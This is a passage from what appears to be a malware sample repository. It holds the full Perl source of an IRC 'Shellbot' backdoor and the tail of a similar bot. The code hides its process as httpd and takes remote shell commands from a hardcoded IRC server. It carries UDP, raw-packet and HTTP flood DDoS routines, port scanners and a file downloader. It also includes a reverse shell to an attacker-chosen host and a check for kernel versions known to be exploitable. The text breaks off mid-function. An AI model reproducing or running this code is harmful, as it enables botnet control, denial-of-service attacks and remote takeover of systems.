socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
{
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx","it","uk","wx",
"eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al",
"dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba",
"bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn",
"hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il",
"jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md",
"mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn",
"ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr",
"tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@dominios)
{
push (@str,"@gstring");
}
my $query="http://buscador.terra.com.br/default.aspx?ca=s&source=Search&query=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
#sendraw("privmsg #Atk33 :DEBUG only test googling: ".$query."");
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}
# NOTE: bY destructive
# pwnz0r!

989
Perl/Backdoor.Perl.Shellbot.aj Normal file
View File

@ -0,0 +1,989 @@
my $processo = "/usr/local/apache/bin/httpd -UdghdfRL";
if (`ps aux` =~ /httpd -UdghdfRL/){exit;}
$servidor='speed.sin-ip.es' unless $servidor;
my $porta='6667';
my @canais=("#sni-labs");
my @adms=("SPEED", "C4Sh", "ODLTEAM");
my $linas_max=10;
my $sleep=3;
my $nick = getnick();
my $ircname = getnick();
my $realname = getnick();
my $acessoshell = 1;
######## Stealth ShellBot ##########
my $estatisticas = 0;
my $pacotes = 1;
####################################
my $VERSAO = '0.2a';
my $version = "!sni";
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0";
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();
#####################
# Stealth Shellbot #
#####################
sub getnick {
return "Rx".int(rand(100000));
}
sub getident {
my $retornoident = &_get("http://www.minpop.com/sk12pack/idents.php");
my $identchance = int(rand(100));
if ($identchance > 30) {
return $nick;
} else {
return $retornoident;
}
return $retornoident;
}
sub getname {
my $retornoname = &_get("http://www.minpop.com/sk12pack/names.php");
return $retornoname;
}
# IDENT TEMPORARIA - Pegar ident da url ta bugando o_o
sub getident2 {
my $length=shift;
$length = 3 if ($length < 3);
my @chars=('a'..'z','A'..'Z','1'..'9');
foreach (1..$length)
{
$randomstring.=$chars[rand @chars];
}
return $randomstring;
}
sub getstore ($$)
{
my $url = shift;
my $file = shift;
$http_stream_out = 1;
open(GET_OUTFILE, "> $file");
%http_loop_check = ();
_get($url);
close GET_OUTFILE;
return $main::http_get_result;
}
sub _get
{
my $url = shift;
my $proxy = "";
grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
my $host = $1;
my $port = $2 || 80;
my $path = $3;
$path = "/" unless defined($path);
return _trivial_http_get($host, $port, $path);
} elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
my $host = $1;
my $port = $2;
my $path = $url;
return _trivial_http_get($host, $port, $path);
} else {
return undef;
}
}
sub _trivial_http_get
{
my($host, $port, $path) = @_;
my($AGENT, $VERSION, $p);
#print "HOST=$host, PORT=$port, PATH=$path\n";
$AGENT = "get-minimal";
$VERSION = "20000118";
$path =~ s/ /%20/g;
require IO::Socket;
local($^W) = 0;
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Timeout => 60) || return;
$sock->autoflush;
my $netloc = $host;
$netloc .= ":$port" if $port != 80;
my $request = "GET $path HTTP/1.0\015\012"
. "Host: $netloc\015\012"
. "User-Agent: $AGENT/$VERSION/u\015\012";
$request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
$request .= "\015\012";
print $sock $request;
my $buf = "";
my $n;
my $b1 = "";
while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
if ($b1 eq "") { # first block?
$b1 = $buf; # Save this for errorcode parsing
$buf =~ s/.+?\015?\012\015?\012//s; # zap header
}
if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
}
return undef unless defined($n);
$main::http_get_result = 200;
if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
$main::http_get_result = $1;
# print "CODE=$main::http_get_result\n$b1\n";
if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/
) {
# redirect
my $url = $1;
return undef if $http_loop_check{$url}++;
return _get($url);
}
return undef unless $main::http_get_result =~ /^2/;
}
return $buf;
}
#############################
# B0tchZ na veia ehehe :P #
#############################
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 2;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0.6);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
elsif ($args =~ /^\001PING\s+(\d+)\001$/) {
notice("$pn", "\001PONG\001");
}
elsif (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
elsif ($args =~ /^(\Q$meunick\E|\Q$version\E)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "$version" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
$meunick = getnick();
nick("$meunick");
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","80","110","143");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
}
}
elsif ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
getstore("$1", "$2");
sendraw($IRC_cur_socket, "PRIVMSG $printl :Download de $2 ($1) Concluído!") if ($estatisticas);
}
elsif ($funcarg =~ /^fullportscan\s+(.*)\s+(\d+)\s+(\d+)/) {
my $hostname="$1";
my $portainicial = "$2";
my $portafinal = "$3";
my (@abertas, %porta_banner);
foreach my $porta ($portainicial..$portafinal)
{
my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@abertas, $porta);
$scansock->close;
if ($estatisticas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Porta $porta aberta em $hostname");
}
}
}
if (@abertas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @abertas");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
}
}
elsif ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP-DDOS]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP-DDOS]\002 Finished with attacking ".$1.".");
}
# Duas Versões simplificada do meu Tr0x ;D
elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta = "$2";
my $tempo = "$3";
my $pacote;
my $pacotese;
my $fim = time + $tempo;
my $pacota = 1;
while (($pacota == "1") && ($pacotes == "1")) {
$pacota = 0 if ((time >= $fim) && ($tempo != "0"));
$pacote=$rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
}
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $1");
}
}
elsif ($funcarg =~ /^udpfaixa\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $faixaip="$1";
my $porta = "$2";
my $tempo = "$3";
my $pacote;
my $pacotes;
my $fim = time + $tempo;
my $pacota = 1;
my $alvo;
while ($pacota == "1") {
$pacota = 0 if ((time >= $fim) && ($tempo != "0"));
for (my $faixa = 1; $faixa <= 255; $faixa++) {
$alvo = inet_aton("$faixaip.$faixa");
$pacote=$rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
if ($faixa >= 255) {
$faixa = 1;
}
}
}
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $alvo");
}
}
# Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Conectando-se em\002: $host:$porta");
}
}
elsif ($funcarg =~ /^oldpack\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
unless ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Média de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
}
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
elsif ($case =~ /^part (.*)/) {
p("$1");
}
elsif ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
elsif ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^root/)
{
if(rooting($printl))
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Rooting]\002 Nothing rootable!!");
}
}
elsif ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg = substr($case, 6);
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg = substr($case, 8);
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
elsif ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
elsif ($case =~ /^nick (.*)/) {
nick("$1");
}
elsif ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
elsif ($case =~ /^raw (.*)/) {
sendraw("$1");
}
elsif ($case =~ /^eval (.*)/) {
eval "$1";
}
elsif ($case =~ /^entra\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
j("$1");
}
elsif ($case =~ /^sai\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
p("$1");
}
elsif ($case =~ /^sair/) {
quit();
}
elsif ($case =~ /^novonick/) {
my $novonick = getnick();
nick("$novonick");
}
elsif ($case =~ /^estatisticas (.*)/) {
if ($1 eq "on") {
$estatisticas = 1;
msg("$printl", "Estatísticas ativadas!");
} elsif ($1 eq "off") {
$estatisticas = 0;
msg("$printl", "Estatísticas desativadas!");
}
}
elsif ($case =~ /^pacotes (.*)/) {
if ($1 eq "on") {
$pacotes = 1;
msg("$printl", "Pacotes ativados!") if ($estatisticas == "1");
} elsif ($1 eq "off") {
$pacotes = 0;
msg("$printl", "Pacotes desativados!") if ($estatisticas == "1");
}
}
}
sub rooting {
my $printl=$_[0];
my $kern=`uname -a`;
if ($kern =~ /2.4.17\s/ || $kern =~ /2.4.18\s/ || $kern =~ /2.4.19\s/ || $kern =~ /2.4.20/ || $kern =~ /2.4.20-8/ || $kern =~ /2.4.21\s/ || $kern =~ /2.4.22\s/ || $kern =~ /2.4.22-10\s/ || $kern =~ /2.4.23\s/ || $kern =~ /2.4.24\s/ || $kern =~ /2.4.25-1\s/ || $kern =~ /2.4.26\s/ || $kern =~ /2.4.27\s/ || $kern =~ /2.6.2\s/ || $kern =~ /2.6.5\s/ || $kern =~ /2.6.6\s/ || $kern =~ /2.6.7\s/ || $kern =~ /2.6.8\s/ || $kern =~ /2.6.8-5\s/ || $kern =~ /2.6.9\s/ || $kern =~ /2.6.9-34\s/ || $kern =~ /2.6.10\s/ || $kern =~ /2.6.11/ || $kern =~ /2.6.13\s/ || $kern =~ /2.6.13-17/ || $kern =~ /2.6.14\s/ || $kern =~ /2.6.15\s/ || $kern =~ /2.6.16\s/)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[Exploitable Kernel !!]\003\002 Im exploitable Kernel: ".`uname -r`);
}
else
{
return 1;
}
return 0;
}
sub shell {
return unless $acessoshell;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "Diretório inexistente!");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c >= "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
sub attacker {
my $iaddr = inet_aton($_[0]);
my $msg = 'B' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65535; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);
# DoS ?? :P
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
#############
# ALIASES #
#############
sub action {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ == 1;
sendraw("MODE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ == 1;
sendraw("MODE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ == 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}
sub modo {
return unless $#_ == 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub whois {
return unless $#_ == 0;
sendraw("WHOIS $_[0]");
}
sub who {
return unless $#_ == 0;
sendraw("WHO $_[0]");
}
sub names {
return unless $#_ == 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
exit;
}
# DCC
package DCC;
sub connections {
my @ready = $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo = $DCC{$fh}{tipo};
my $arquivo = $DCC{$fh}{arquivo};
my $bytes = $DCC{$fh}{bytes};
my $cur_byte = $DCC{$fh}{curbyte};
my $nick = $DCC{$fh}{nick};
my $msg;
my $nread = sysread($fh, $msg, 10240);
if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
$DCC{$fh}{status} = "Cancelado";
$DCC{$fh}{ftime} = time;
$dcc_sel->remove($fh);
$fh->close;
next;
}
if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} += length($msg);
my $cur_byte = $DCC{$fh}{curbyte};
open(FILE, ">> $arquivo");
print FILE "$msg" if ($cur_byte <= $bytes);
close(FILE);
my $packbyte = pack("N", $cur_byte);
print $fh "$packbyte";
if ($bytes == $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} = "Recebido";
$DCC{$fh}{ftime} = time;
next;
}
} elsif ($dcctipo eq "send") {
my $send = $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} = 'sendcon';
$DCC{$send}{itime} = time;
$DCC{$send}{nick} = $nick;
$DCC{$send}{bytes} = $bytes;
$DCC{$send}{curbyte} = 0;
$DCC{$send}{arquivo} = $arquivo;
$DCC{$send}{ip} = $send->peerhost;
$DCC{$send}{porta} = $send->peerport;
$DCC{$send}{status} = "Enviando";
#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq 'sendcon') {
my $bytes_sended = unpack("N", $msg);
$DCC{$fh}{curbyte} = $bytes_sended;
if ($bytes_sended == $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} = "Enviado";
$DCC{$fh}{ftime} = time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}
sub SEND {
my ($nick, $arquivo) = @_;
unless (-r "$arquivo") {
return(0);
}
my $dccark = $arquivo;
$dccark =~ s/[.*\/](\S+)/$1/;
my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
my $longip = unpack("N",inet_aton($meuip));
my @filestat = stat($arquivo);
my $size_total=$filestat[7];
if ($size_total == 0) {
return(0);
}
my ($porta, $sendsock);
do {
$porta = int rand(64511);
$porta += 1024;
